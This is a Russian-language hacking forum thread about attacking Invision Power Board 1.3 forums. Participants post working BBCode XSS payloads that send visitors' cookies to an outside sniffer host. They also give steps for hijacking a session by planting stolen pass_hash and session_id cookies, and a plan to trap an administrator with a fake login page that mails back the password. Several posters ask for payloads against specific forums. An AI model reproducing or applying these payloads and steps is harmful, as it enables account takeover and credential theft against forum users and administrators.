Форумы Вопросы по форуму Invision Power Board(U) v1.3 Final © 2003(р)

Discussion in 'Уязвимости CMS/форумов' started by FRTD, 17 Feb 2005.

  1. ExpertLamer

    ExpertLamer Guest

    Reputations:
    0
    Потому что первый раз уже вписалось.

    Поэтому иди на чистое место.

    И когда код виден он соровно работает не бойся.

    Тут не код проблема а теги.
     
    #21 ExpertLamer, 17 Feb 2005
    Last edited by a moderator: 18 Feb 2005
  2. FRTD

    FRTD New Member

    Joined:
    12 Feb 2005
    Messages:
    31
    Likes Received:
    1
    Reputations:
    0
    понятно,ну этот код тока для эксплорера пашет=(И что хуже,там нету реферера,приходиться сидеть и ждать
     
  3. FRTD

    FRTD New Member

    Joined:
    12 Feb 2005
    Messages:
    31
    Likes Received:
    1
    Reputations:
    0
    а почему не пашет рассылка всех данных снифера?Написано:оставить рефер пустой и пришлют все данные.А пустым он не принимает
     
  4. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Нужно обязательно ставить фильтр либо на реферер, либо на Query.
     
  5. ExpertLamer

    ExpertLamer Guest

    Reputations:
    0

    EDIT: Ошибка, прошу прошение. Когда код виден, то он работать НЕ будит.

    Только что проверил.

    Ищи другие теги так как проблема почему виден код в том, что ИЭ и Firefox по разному обрабатывают тег "IMG".

    И ещё. Ты просто не знаешь что такое что.

    HTML:
    [COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie) [/COLOR]
    Вот это код. "К:" это QUERY. REFERER это адрес страничьки где находится сам код.
    Вот образец REFERER:
    http://www.izvestia.ru/forum/topic.cgi?forum=8&topic=9663&start=0
     
  6. ExpertLamer

    ExpertLamer Guest

    Reputations:
    0
    Когда имеешь кукииз и у тебя нет пароля, то на любых версиях можно зделать следуещие.

    Используй javascript:void(document.cookie)

    Код:

    javascript:void(document.cookie="pass_hash=XXXXXX"); javascript:void(document.cookie="session_id=XXXXXX"); javascript:void(document.cookie="user_id=XXXXXX")

    Это ты должен всё в URL поставить и самое главное не забудь, ты должен быть в входе под другим именем. Тоесть ты должен быть "Logged in". Потом вводишь это и нажимаешь GO а потом Refresh.

    И самое главное знай что чтобы это у тебя получилось, твоя жертва тоже должна быть "Logged in". Если у тебя жертва "Logged out" то по МОИМ тестам нечиго не получится. Хотя если Я не прав поправте.

    А с прогой Inetcrack тесты Я пока не делал так что не знаю, может не получится если жертва не "Logged in" ?

    Алгол Я не разу не мог поменять фонт или попугать людей как ты вот тут. http://antichat.ru/txt/IPB/index1.php
    Если можешь, то помоги пожалуйста.

    Вот мой код который Я вставляю. Я его изменил на калар тег, но может быть проблема не в теги а в фильтре? Что конкретно что за проблема не понимаю.

    Вот Я написал собственный код изменив тег "VIDEO" на "COLOR"

    HTML:
    [COLOR=[IMG]http://aaaaa/=`aaajpg[/IMG]]` style=background:url(javascript:document.body.innerHTML="http://antichat.ru/h.gif")[/COLOR]
    Работает но как то не так и только когда PM кому то посылаю. А может быть адрес картинки поменять?
    А когда пост делаю вообще не работает может быть потому что фильтор стоит но какой?
     
    #26 ExpertLamer, 18 Feb 2005
    Last edited by a moderator: 18 Feb 2005
  7. FRTD

    FRTD New Member

    Joined:
    12 Feb 2005
    Messages:
    31
    Likes Received:
    1
    Reputations:
    0
    чё туда надо вставлять адрес?Типа так?
    Code:
    [COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:http://www.****.com/forum/index.php?showtopic=4"+document.cookie) [/COLOR]
    Раз на Фоксе не пойдёт,мож кто нить другой код подскажет?Какой нить универсальный что ли?
    По поводу хэша:не проще его расшивровать?Тогда никого ждать не надо
     
    #27 FRTD, 18 Feb 2005
    Last edited by a moderator: 3 Jan 2006
  8. ExpertLamer

    ExpertLamer Guest

    Reputations:
    0
    Чего????

    Ты меня совсем запутал. Что встовлять Я помой му уже очень хорошо расказал.

    Ещё раз всё прочти или правильно задай вопрос Я не понил что ты спросил.
     
  9. FRTD

    FRTD New Member

    Joined:
    12 Feb 2005
    Messages:
    31
    Likes Received:
    1
    Reputations:
    0
    Распутываю:существует ли какой либо код,но универсальный для большинства браузеров?Если да,то где взять?
     
  10. ExpertLamer

    ExpertLamer Guest

    Reputations:
    0
    Napisat' svoiu.
     
  11. KEZ

    KEZ Guest

    Reputations:
    0
    Вложенные теги сработают только в IE
    а [videо] везде вроде
     
  12. FRTD

    FRTD New Member

    Joined:
    12 Feb 2005
    Messages:
    31
    Likes Received:
    1
    Reputations:
    0
    вообщем давайте так:есть форум http://www.qwerty.com/forum/
    можете мне написать код,чтобы он работал в большинстве браузеров,или хотя бы только для ИЕ,но чтобы реферер работал,пажаласта,очень надо
     
  13. FRTD

    FRTD New Member

    Joined:
    12 Feb 2005
    Messages:
    31
    Likes Received:
    1
    Reputations:
    0
    ЛюДИ!Есть кто живой?Ответте пажаласта
     
  14. coyl

    coyl Elder - Старейшина

    Joined:
    14 Jan 2005
    Messages:
    125
    Likes Received:
    3
    Reputations:
    2
    frtd -псих
    сам с собой разговариват =)
     
  15. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    231
    Likes Received:
    3
    Reputations:
    0
    Бывает)
     
  16. FRTD

    FRTD New Member

    Joined:
    12 Feb 2005
    Messages:
    31
    Likes Received:
    1
    Reputations:
    0
    просто никто не отвечает
     
  17. Xeeper

    Xeeper New Member

    Joined:
    6 Mar 2005
    Messages:
    19
    Likes Received:
    2
    Reputations:
    0
    Frdt не псих
     
  18. White Jordan

    White Jordan Guest

    Reputations:
    0
    Почему?
     
  19. advlam

    advlam New Member

    Joined:
    11 Mar 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    А какую дыру использовать на Powered by Invision Power Board(U) v1.3.1 Final © 2003 IPS, Inc.???
     
  20. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    1. делаешь свой снифер (чтобы без всяких подписок) Используешь баг с спаренными тэгами (т.е. пихаешь админу в ПМ снифер). И ждёшь когда прилетят к тебе куки. Потом редактируешь свои.
    2. (если куки непришли) Спомощью тех же тэгов делаешь пересылку на свою страницу в ПМ админу. А на своей странице точная копия того форума (одна страница ошибки авторизации) Но в теле этой страницы ввод пароля и логина придёт к тебе на ящик. :)
    Покрайней мере у меня работало =)
    P.S. Это для MyIE и IE
     
Loading...